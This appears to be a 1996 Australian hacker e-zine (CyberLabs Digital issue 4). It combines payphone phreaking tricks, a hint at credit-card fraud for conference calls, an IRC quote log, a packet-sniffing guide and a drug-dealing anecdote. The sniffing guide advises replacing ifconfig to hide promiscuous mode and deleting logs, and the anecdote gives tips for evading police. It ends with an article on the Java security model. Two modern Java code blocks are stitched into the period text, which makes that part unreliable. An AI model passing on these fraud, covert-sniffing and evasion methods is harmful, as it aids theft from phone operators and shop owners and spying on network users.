I also have in my possession a program that can be used to decode pager tones. It's called POCSAG Decoder (PD-201.zip) and can operate off scanners and the like, once a small circuit has been built. So far I have been successful in getting it to work with pagers made by Link Telecommunications. Telstra pagers don't seem to work; I think they use a different system called GOLAY. Anyway, if you would like a copy of this (or have some ideas etc.) send me some mail. I originally found it somewhere on the Internet, so search there as well. Maybe a newer version will be out.

How to contact me...
Myst (vk3hax) - darrin@lin.cbl.com.au (will be down sometime September 1996)
              - robinson@smbadm.ballarat.edu.au after September (include my alias at top)
Or on IRC (usually only OzNet) under the name Myst, Mystik or Magik.

._________________________________________________________________________.

-= ozPhreakin' - aCiD XTReMe - August '96 -=
Revision 3.1
Catch me on #SeCuRiTY! in OZNET

This text is only to be used as an informative document. I do not encourage these activities at all, nor will I accept any responsibility in any circumstances where the below techniques are practised.

The phreaking scene is nearly dead in Oz; all the yankee hype of blueboxing and redboxing is all bullshit. Telstra having an overly advanced fone system isn't helpin' us either. But never say never, there is always some way to break the fone Xchange. Just look at AT&T, some bigshots they are, scoopin' in $$$ every day, and still they have faults in their system. Can't blame 'em tho, nobody's perfect, no matter how stinkin' rich ya are.

-=-=-=-=-

Be vewwy careful. Telstra is watching you. With their ESS system (electronic switching system), Telstra is able to log every call you make, even 1800 and operator assisted numbers. I suggest, if you do try phreakin' (I do not encourage this activity), do it very carefully, by not using your own fone or friends'/relatives'. Do not repeatedly call a single place in such a short time and do not leave any names, addresses or numbers. All of this must be common sense for you, this is just a friendly warning.

-=-=-=-=-

Freecalls.

COCOTs seem to be an easy target for phreakers these days, as they are poorly made, and Telstra don't really give a rat's ass about them; after all, they still are getting the money, even if people are phreakin' them. What is a COCOT? I'm glad you asked. It stands for Customer Owned Coin Operated Telephone. Telstra has released many models of these little beauties.
The crude, yet effective way of gettin' free calls off these babies is just brute force. First pointed out to me by a friend of mine, he simply hit the machine to get his 40c call. As it seems, the architecture of the fone itself has a tiny flaw, which is that coins can simply be knocked out of the box and into your hand. Knock it a few times and you get enough to buy yourself a scratchy and hopefully win yourself enough cash to get a mobile fone. Oh, just in case you're wondering, the fone I was talkin' about is the goldfone released by Telstra, the one with the 'follow on' button on it. This way is quite brutal, and may attract attention. Also, the payfone is hired by shops to make money. Abuse the privileges of free calls and you might find a disgruntled shopkeeper with a $1000 fone bill takes away the fone, leaving you stranded. At the current version of this document this technique still works.

A technique that I have known about for a while now (but have not yet perfected) is the 'follow on' trick. Find yourself a gold fone and make sure nobody else is lookin' at ya. Now grab the receiver and listen for the dial tone. Hold down the follow on button and slam down the receiver, then pick up the receiver while still holding down the button, and dial away.

Another technique that has been known to work goes back to the COCOTs. If you look around, you could find yourself a COCOT which is not sold by Telstra. These are usually poorly made thingoes that are available to the public from Dick Smith for a few hundred bucks and can be plugged into any fone socket. You can usually find these at pubs and newsagencies. One trick you can do is just trace the fone line to the socket in the wall, whip out your beige box, and connect it to that. In most cases the line is hidden behind something, so you could just cut the line and use that to beige box.

A technique that has only worked once for me is using a tone dialer on them.
Dial up a 1800 number, which will be free, and get the person on the other side to hang up. The fone will reset itself and go back to the dial tone. The keypad is now still disabled, so you just whip out the tone dialer and dial away.

Get yourself a fone number to any payfone, dial it using a mobile or whatever, then pick up the receiver of the fone you dialed. Hang up the other end and then whip out your tone dialer. You may realise that the touch pad is disabled, so then flick the hook once, and it should hang up the line. The fone resets itself, so you use the tone dialer to dial the number you want. This trick works great if you know the number to any box that is close to another one. All you spend is 40c for the call, and you get yourself free STD/0055/IDD calls. You can also get some numbers that dial your number back. Useful for boxes that aren't close to others.

-=-=-=-=-

1800's

Free calls are a fun thing to do, even more fun when they're totally legal. This is where the 1800 Xchange comes in. Once known as 008 numbers, these are free to the caller from a home fone or a payfone. Scanning these numbers may get you some juicy connections: a data line, fax line, international line or even an adult service line.

Adult services. You may think these numbers are perverted, or you may think they are the best thing since sliced bread, but they have many other applications for a fone phreak to use. Call one up and use a credit card number (I'm sure U know what I'm hinting at here), now get someone you know to call it and do the same. You now have yourself a conference line. Ask nicely if the fone sex chick could just let you talk to your friends. She shouldn't mind as she is getting paid for all that, but others who you don't know may be in the room at the same time, so pay some respect to these women and do what they say.

More next issue!

.____________________________________________________________________________.

.___________________.._____..__________________.
|         #SECURiTY LaME & WIERD QU0TES        |
|          ASSEMBLED BY THE CLD CREW           |
'______________________________________________'

does anyone know how to phreak in australia? i have been trying but have had no luck
duh!
* TWILIGHT is rolling on the floor, laughing at dude until he just about pukes!
next dumb question
anyone have any tips?
> anyone have any CC#'s ... h0h0h0h0h0
anyone got any warez sites :>

yeah dude.. find one of those pits in the ground (not the ones with a T on it.. thats not what youre looking for) and go in, and play with the cables. the think ones are phone lines
once in there, you plug in your phone, and free calls
haha
no seriously i am
its called pitting
its a phreaking technique
he is
the ones marked as telstra are actually power supplies. the other ones actually contain the phone cables
im gonna have to do some serious link chasing nem
the page will be found!
another one.......walk upto some dude, belt him around the head, take his mobile and use it till it ties :>
shhh dking! dont tell him our techniques
> ties ... i have not tried that ;)
acidx: sorry man just tryig to be helpful
good site for info http://www.sentry.afp.gov.au/~phreak
to get free calls on normal payfones, dial 0002663##**#5571##*
dont tell him all our secrets acidx
telstra wil never be able to block that technique nems
*dude* thanks for the help
unless they change every hardware in australia, that technique will work
unreal! thanks
0002663 will enable the linesman operating system
have to type it in really fast or it wont work
##**# will get it to test a phone connection, so you put in any number you want to call, and 5571 is the code, op asst will initialise the connection, and ##*. well, dunno what that does
how long do you have to hold in the op assitant button
hold it for about 5 secs maybe 6..
oh dking do you have another site that one doesn't work!
its totally untraceable too. as ESS does not log it as a call
call anyone, theres absolutely no way (unless someone is testing the line at he time) to find out who you call and where
works for all numbers too
even overseas? and international?
ummmmmm maybe its without the www...yeah i think the afp just use http://sentry.afp.gov.au/~phreak
hell yes, even on the moon
*ROFL*
no doesn't work either
oh dking, that site doesnt work either ;>

[ed note: as u can see, dude's IQ spans that of a retarted KUA member. LOL. Very few of the techniques described here would even work, & http://sentry.afp.gov.au/~phreak. wot kinda fool would be dat lame? h0h0h0]

that'll attract the feds like moths to a flame
is there any books on hacking?
the does superuser mean?
what program do you use to hack pc's
how do you get the number of the other pc
so warez is copied files?
can i have ops?
if ya dont know what to do in a unix sys mind DONT TRY TO HACK IT
.me is from oz.. DOH!
feds are pussy's
*** ssnake changes topic to "Absolutely >NO< illegal activity going on in here, so piss off!"
* Reaper killed millions of aliens in ufo's by farting on an ant hill!..
ne1 here know about ozemail tightening up the security?
fedz are on Ozemail
i really wanna learn something
does anyone know how to phreak in australia? i have been trying but have had no luck
what is the root account?
what does @ next to your alias mean?
so who are telstra again?
*** BlackHaze changes topic to "Morphin back at ya wiff 0-day kardin' k0d3z#!@ wh00t#@!"
DeM k0DEz /\Re k0MinG T|-|Ru
PGPfone? Don't think zimmerman programmed that one did he?
Hello fellow hackers!
i'm not lame you are!
what is lag?
what is +tn on the top of the window mean?
<|-XYZ-|> who has something to trade 4 a T1 hacking site??
shaman: #hacking is soon to be shut down by ircops....
The meaning of "hacker" has been twisted by the media
Is it true that the US government forced the D00d who write PGP to write a backdoor into the latest international versions?
[Ed: We at CLD can verify the existence of the pgp backdoor ;> ]
pinz: he must have hacked root on machine to create account or are they non unix machines... thats a major feat in itself
<{_DeV_}> yeah, hacking away the bricks....
i am the hacker of hackers
Sage: oh, da haqrz of all haqrz... hhehe. spew forth your knowledge
graduated from SAS swat team 2 yrs ago
[Ed: Sage said to me that for graduating from SAS, he managed to steal 7, that's right, seven waterpistols!!]

.____________________________________________________________________________.

-= The Basics of Sniffing -=
By MiNDWaRP

Intro
~~~~~

Well, this is my first article for CLD, so I will try to make it as good as possible. For those ppl who don't know me, my name's MiNDWaRP and you can occasionally find me on #security on IRC. Other than that you can mail me through KaosNet or DaemonNet.

This issue's article is to do with sniffing: how to gain heaps of information not meant for you by spying on Ethernet packets. Uses could include spying on email through to gaining credit card numbers/account numbers. However, you must have root axs on a networked computer before you can do this. This article will not detail how to get root, but it will tell you the basics of what sniffing is, programs you need to do it, some common sense advice when it comes to sniffing, and some source code you can compile...

Greetz
~~~~~~

Greetz go to Grim, TPV, Void, AciDX, and everyone else in the scene.

Fuq offs
~~~~~~~~

Fuq offs go to the eternally pathetic Pierre Thorand, and all the try-hard lamer anarchists who do nothing but talk.. if you're so good why don't you prove it...

The basics of sniffing
~~~~~~~~~~~~~~~~~~~~~~

Computer networks today, unlike telephone systems, rely upon computers sharing information rather than individual connections to a central mainframe. This means that a computer connected to a network is capable of receiving information that was meant for another computer.
Capturing the information as it passes through the network is known as sniffing. Nowadays the most "popular" way of connecting PCs is through Ethernet. For those who don't understand how Ethernet works, I will briefly describe it for you. The Ethernet protocol works by sending small "packets" of info to all machines/PCs on the same network. Contained within the packet is what is known as a packet header. This header contains the address of the destination machine. Supposedly (yeah right.. ;) only the machine with the matching address is meant to receive the packet. A machine that accepts all packets is said to be in promiscuous mode. In a normal networking environment, account and password information is passed along in clear text, making it relatively easy for someone, once they have gained root axs on a machine, to put it into promiscuous mode and, by sniffing, "compromise" all the machines in the network.

How do I do it..?
~~~~~~~~~~~~~~~~~

Well, the primary way us hackers compromise these Ethernet packets by sniffing is through the use of groovy little progs. One such program is called esniff.c, which is for use on Unix systems. However, there is a variety of sniffers available, both freeware and commercial, for most OSes.

Network Sniffers
~~~~~~~~~~~~~~~~

* Snoop on Solaris 2.x, also works on SunOS 4.1 - ftp.playground.sun.com
* Packetman - ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips|sgi|alpha|solaris2]/packetman-1.1.tar.Z <- (haven't checked this out)
* Esniff.c - ftp.coombs.anu.edu.au:/pub/net/log

Dos based sniffers
~~~~~~~~~~~~~~~~~~

* Ethdump v1.03 - ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip
* Ethload v1.04 - companion util for use with an ethernet monitor - ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip

These are not the only sniffers available; there are commercial ones available too, but who is going to PAY for one of these...?
There are also many sniffers coming out recently which are available at most good hacking web sites.

Advice when using a sniffer
~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. A method used by sysadmins to detect a sniffer that only collects data, and does not actually respond to any of the information, is to "physically" check all ethernet connections in a network. So if you are running a sniffer from a computer you have regular axs to, i.e. at work or school, but you have physically connected it to a network that it's not meant to be connected to, it makes sense to disconnect it after you are finished. In other words, minimise the time it is connected to minimise the risk of getting caught.

2. There is a command on some Unix systems which allows a sysadmin to check the status of all interfaces and whether or not they are in promiscuous mode.

   >ifconfig -a

   You should run this to see whether the sniffer you are using is detectable. By replacing the command "ifconfig" you will greatly reduce the chances of detection.

3. When you run a sniffer make sure you regularly check the log it creates, copy it if necessary, and delete it afterwards. This is due to the fact that if you run a sniffer on a heavily-utilised network the log becomes so large that all the file space is used up. Now obviously it would take a while to happen, but if you carelessly leave one running it is possible.

.____________________________________________________________________________.
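The two mechanisms the sniffing article above turns on, the destination-address filter that a network card normally applies and the promiscuous-mode flag that "ifconfig -a" shows, as an added example that is not the article's code nor any sniffer's: nicAccepts() decides whether a card would deliver a frame in normal versus promiscuous mode, and promiscuousInterfaces() picks the PROMISC flag out of ifconfig output (the MAC addresses, frame and ifconfig text are constructed, and the class name is an assumption). From the sysadmin's side, the article's own point cuts the other way: a replaced ifconfig binary hides the flag, so run the check from a copy you trust.

```java
import java.util.ArrayList;
import java.util.List;

/** Added example: what a NIC does with an Ethernet frame, and what ifconfig -a reveals. */
public class SniffCheck {
    /** Would an interface with hardware address 'own' pass this frame up the stack? */
    static boolean nicAccepts(byte[] frame, byte[] own, boolean promiscuous) {
        if (frame.length < 14) return false;        // header: 6 dst + 6 src + 2 ethertype
        if (promiscuous) return true;               // promiscuous mode: everything on the wire
        boolean unicastToMe = true;
        for (int i = 0; i < 6; i++) if (frame[i] != own[i]) unicastToMe = false;
        boolean groupAddress = (frame[0] & 0x01) != 0;   // multicast, including ff:ff:ff:ff:ff:ff
        return unicastToMe || groupAddress;
    }

    /** Interface names whose ifconfig -a block carries the PROMISC flag (Linux net-tools, old and new layout). */
    static List<String> promiscuousInterfaces(String ifconfigOutput) {
        List<String> hits = new ArrayList<>();
        String current = null;
        for (String line : ifconfigOutput.split("\n")) {
            if (!line.isEmpty() && !Character.isWhitespace(line.charAt(0)))
                current = line.split("[:\\s]")[0];      // "eth0: flags=..." or "eth0      Link encap"
            if (current != null && line.contains("PROMISC") && !hits.contains(current))
                hits.add(current);
        }
        return hits;
    }

    public static void main(String[] args) {
        // constructed addresses and frame: unicast from 'me' to 'other', ethertype 0x0800 (IPv4)
        byte[] me    = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
        byte[] other = {0x00, 0x11, 0x22, 0x33, 0x44, 0x66};
        byte[] frame = new byte[14];
        System.arraycopy(other, 0, frame, 0, 6);
        System.arraycopy(me, 0, frame, 6, 6);
        frame[12] = 0x08; frame[13] = 0x00;
        System.out.println("normal mode delivers to 'me': " + nicAccepts(frame, me, false));
        System.out.println("promiscuous mode delivers:    " + nicAccepts(frame, me, true));

        // constructed ifconfig -a output, not captured from a real host
        String sample = "eth0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500\n"
                      + "        inet 192.0.2.10  netmask 255.255.255.0\n"
                      + "eth1      Link encap:Ethernet  HWaddr 00:11:22:33:44:55\n"
                      + "          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1\n"
                      + "lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\n";
        // a trojaned ifconfig can strip this flag, so run the check from a trusted binary
        System.out.println("interfaces in promiscuous mode: " + promiscuousInterfaces(sample));
    }
}
```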
DIsClAiMeR: The following story is fictitious and bears no resemblance to things that may or may not have happened to persons living, dead or undead :>

Getting Trashed By The Cops
~~~~~~~~~~~~~~~~~~~~~~~~~~~

I lived in a house with two other guys, a drummer and a loser, we'll call them Chuck and Steve. We lived on a busy main road, an had lots of friends droppin by, to say hello an score. I probably moved an ounce or so a week in $50 bags to people we knew from school and other acquaintances, which was fine by me, a few $$$ on the side an free smoko whenever I wanted it. Not so for Steve, he couldn't keep his side of things together, he'd constantly smoke more than he sold an eventually put himself out of business, ie no one would give him credit, so he couldn't deal. So I inherit Steve's 'dealership' which was pretty big, full of people I didn't really know that well, but they had the cash an knew not to ask for credit. I started to move a LOT more dope, Steve was unemployed an at home all day and was able to handle the distribution during the day, he was under strict orders of no credit to anyone and would 'skim' off the top of the bags to keep himself in dope.

Things were going along quite nicely, I had a nice little earner on the side, Steve was getting as bent as he wanted. Then things started to get a little odd, our garbage bin would move from where I left it, the side gate was sometimes open or ajar, I figured it was one of the guys being lazy or somethin, I shrugged it off as my legit business was booming and I didn't have the time or the motivation to look into it.
Things got worse, people I didn't know started knockin on the door an askin to score, if Steve wasn't there to vouch for them I'd tell them to FUCK OFF, things were gettin a bit outta hand, upon quizzing Steve most of the people he could ID but some he didn't know, he passed them off as friends of friends. This was not good, I was aware that what we were doing could get us into a lot of trouble, Steve however didn't really give a fuck or understand what his actions could lead to. The dealing continued with me telling Steve to scale things down to a manageable level. I might add that Chuck was cool an kept his part of the dealings in control. Steve didn't scale things down, the phone was ringin off the hook an people were comin an goin like crazy on weeknights (usually a quiet time). It was round then I quizzed the guys about the garbage bin an the side gate. They said they never used the gate and I was the one who had the garbage duties.....

It took a while for the penny to drop, so life went on, people who called in after 11pm on weeknights were greeted at the door by me an a pump action shotgun, that problem soon stopped. Things were back to 'normal', a lotta comings an goings mostly Thur, Fri, Sat which was cool an the bin seemed to stop moving and the gate remained closed.

It was a Tuesday night/Wednesday morning about 2.30am, the doorbell rang an rang an rang till I woke up, grabbed my rifle an answered the door (I was not in a good mood). There was a woman dressed in a local pub staff shirt asking if she could score, saying she'd heard she could score from here. I'd never seen her before and out on the street a late model Commodore was waiting for her, I told her to FUCK OFF! She took the advice and left.

The penny finally dropped, the barmaid was an undercover COP, and the moving bin thing was the COPS TRASHIN US FOR EVIDENCE. FUCK!
Next morning we had a meeting, I declared the shop was SHUT. I didn't need the shit that happened last nite and stopped giving Steve product to sell an told him to spread the word to his 'friends'. New precautions were placed on the garbage, every night I'd pour sour milk or mouldy potato juice or anything else disgusting I could find over our garbage.

About a week later I found 1/2 the contents of our garbage bin laying in our backyard. The bin was previously left out the front, I sorta felt sorry for the cop who went thru it, as it was a particularly disgusting pile of rubbish, my guess was they got halfway thru and got sick, suckers.

Oh well, time to move, that day I terminated the lease and within a fortnight was in a different house with different people.

Some lessons learned: never throw out incriminating evidence with your household waste (yeah even 'roasted' cigarette butts), it seems the cops have been trashin long b4 hackers existed. Sell only to who u know, if I sold to the 'barmaid' who knows what would've happened. It won't be your own stupidity that gets u busted, it'll be someone else who fucks things up for you. Steve was STUPID, he has since gone down for several possession and trafficking charges, once the cops know who u are they keep a close eye on you. If in doubt move out, it's cheaper than a court case.

-JET BLACK
Catch me on #security on Oznet

.___________________________________________________________________________

-= Java Security - Does Sun's new language promise security on the Internet -= By CLD Staff -= Revision 1.2

Java. Yes, no doubt one of the biggest media hype-ups concerning computer languages of all time. Many people believe that Java is just for pretty multimedia purposes on web pages. In fact this is definitely not the case; more than half the digital community do not see the full potential of this exciting new language. To put it simply, Java is not another form of multimedia scripting/authoring but rather programming for the Internet.
It extends far beyond buttons, sounds and animations on the web. Take the case that you had an Oracle database on a mainframe which did not support HTTP: you could write a Java applet to communicate directly with the server and pump the data out of the mainframe directly onto the web with little hassle. Let's hope that people grasp this exciting new language, as it looks as though Java will radically change the Internet as we know it today.

With Java extending such large capabilities, security issues become a concern. As a general rule of thumb, any data accessed over a network other than the local one is presumed 'untrusted', and the Java environment takes precautions so that an applet cannot perform malicious actions (such as corrupting your system, opening network connections to untrusted sources, deleting files etc). Sun has realised this and in turn has focused much attention on addressing security related problems in the Java environment. But as always, bugs are prominent in the security model, and measures have to be taken to ensure that malicious code won't be able to run.

Java Security Restrictions

The Java security model has some heavy restrictions on what a Java applet can and cannot do. Intermediate security options are available to allow an applet to run in a less restricted environment, and as Java gains its foothold on the Internet, web clients will allow user control over these restrictions, for applets to open network connections to other hosts and for more flexibility over disk I/O on the local system etc.
Generally speaking, an applet loaded over a network other than the local one is subject to the following restrictions. It cannot:

- Read/write files on the local system
- Open a network connection to other hosts, other than the one the applet originated from
- Check for the existence of a file on the local system
- Listen for incoming network connections on any port on the local system
- Call System.exit() or Runtime.exit() to force the Java client to exit
- Create a SecurityManager/ClassLoader object
- Obtain user information, or obtain information about the following system properties: user.home, java.home, user.name, user.dir, java.class.path
- Access or load any other class, other than the standard eight packages: java.awt, java.lang, java.net, java.io, java.applet, java.awt.peer, java.util, java.awt.image
- Manipulate any ThreadGroup other than its own
- Call File.delete() to delete files on the local system, or invoke rm or del
- Call File.rename() to rename files on the local system, or invoke mv or rename
- Call File.mkdir() to create directories

The Java application which runs the applet decides whether many of the above restrictions apply. If an applet is loaded from the local network, many if not all of the above restrictions are lifted and the applet can usually run in a more or less unrestricted environment.

java.lang.SecurityManager controls which security operations are allowed under the current environment. Applet clients create a subclass of SecurityManager to implement the security policy they will use. A security policy is put in place by calling System.setSecurityManager(). An obvious security hole would exist if untrusted code loaded over the network could install its own SecurityManager object: the applet could then run itself in its own environment without any restrictions. Of course Sun has realised this huge problem, and measures are in place so that untrusted code cannot load its own SecurityManager object.
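A SecurityManager subclass of the kind the paragraph above describes, as an added example that is neither the article's nor Sun's code: connections are allowed only back to the origin host, the local file system, System.exit() and the hidden system properties are refused, and the hole the article names, untrusted code swapping in its own manager, is closed in checkPermission(). It uses the legacy java.lang.SecurityManager API (deprecated since Java 17 and disabled in current JDKs), so the check methods are exercised directly rather than installed with System.setSecurityManager(); the class name, origin host and file path are assumptions.

```java
import java.security.Permission;

/** Added example: an applet-style policy in the legacy SecurityManager API (names are hypothetical). */
public class OriginOnlyPolicy extends SecurityManager {
    private final String originHost;   // the host the applet was loaded from

    public OriginOnlyPolicy(String originHost) { this.originHost = originHost; }

    @Override public void checkConnect(String host, int port) {
        if (!originHost.equalsIgnoreCase(host))
            throw new SecurityException("connect to " + host + ":" + port + " refused: not the origin host");
    }
    @Override public void checkConnect(String host, int port, Object context) { checkConnect(host, port); }
    @Override public void checkListen(int port) {
        throw new SecurityException("untrusted code may not listen on port " + port);
    }
    @Override public void checkRead(String file)   { deny("read", file); }
    @Override public void checkWrite(String file)  { deny("write", file); }
    @Override public void checkDelete(String file) { deny("delete", file); }
    @Override public void checkExit(int status) {
        throw new SecurityException("System.exit() is not allowed from untrusted code");
    }
    @Override public void checkPropertyAccess(String key) {
        if (key.startsWith("user.") || key.equals("java.home") || key.equals("java.class.path"))
            throw new SecurityException("property " + key + " is hidden from untrusted code");
    }
    @Override public void checkPermission(Permission perm) {
        // the hole the article describes: untrusted code installing its own SecurityManager
        if (perm instanceof RuntimePermission && perm.getName().equals("setSecurityManager"))
            throw new SecurityException("replacing the SecurityManager is not allowed");
        // anything not covered by the explicit checks above is permitted in this sketch
    }
    private static void deny(String op, String file) {
        throw new SecurityException(op + " of " + file + " refused: local file system is off limits");
    }

    public static void main(String[] args) {
        OriginOnlyPolicy policy = new OriginOnlyPolicy("applets.example.net");
        policy.checkConnect("applets.example.net", 80);   // allowed: same host the applet came from
        try { policy.checkConnect("mail.example.org", 25); }
        catch (SecurityException e) { System.out.println("blocked: " + e.getMessage()); }
        try { policy.checkRead("/etc/hosts"); }
        catch (SecurityException e) { System.out.println("blocked: " + e.getMessage()); }
        try { policy.checkPermission(new RuntimePermission("setSecurityManager")); }
        catch (SecurityException e) { System.out.println("blocked: " + e.getMessage()); }
    }
}
```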
With the added security of java.lang.ClassLoader, this class prevents an applet from replacing the standard eight Java packages with its very own. Not only does the Java environment include tough measures in how classes are loaded over the network and what security measures are in place for the applet to run in an environment defined by the SecurityManager, it also provides byte-code verification, where code is checked to ensure that it cannot forge pointers to memory or cause strange things to happen in the running of the applet.

Overall, Java's security is well structured, but some important bugs need to be addressed before Sun can claim that Java's security is unbreakable.

.____________________________________________________________________________.

-= neXt iSSUE

Well, we hope that this issue is up to standard, as we have totally re-organised the way CLD works and the writers/editors involved.. Until next issue, try desperately to unite the scene and finally lift it off the ground, as we feel that time has finally come..

neXt iSSUE...

TCP/IP & its structure
The CLD crew will investigate bugs behind linux & write some ka0s k00l code.
More Aussie Phreaking Techniques
More News, Java fakemail applets...
& Much more.

.____________________________________________________________________________.

CYBERLABS DiGiTAL iSSUE 4
bhaze@fl.net.au
diceman@fl.net.au
sydney.oz.org - #security

EOF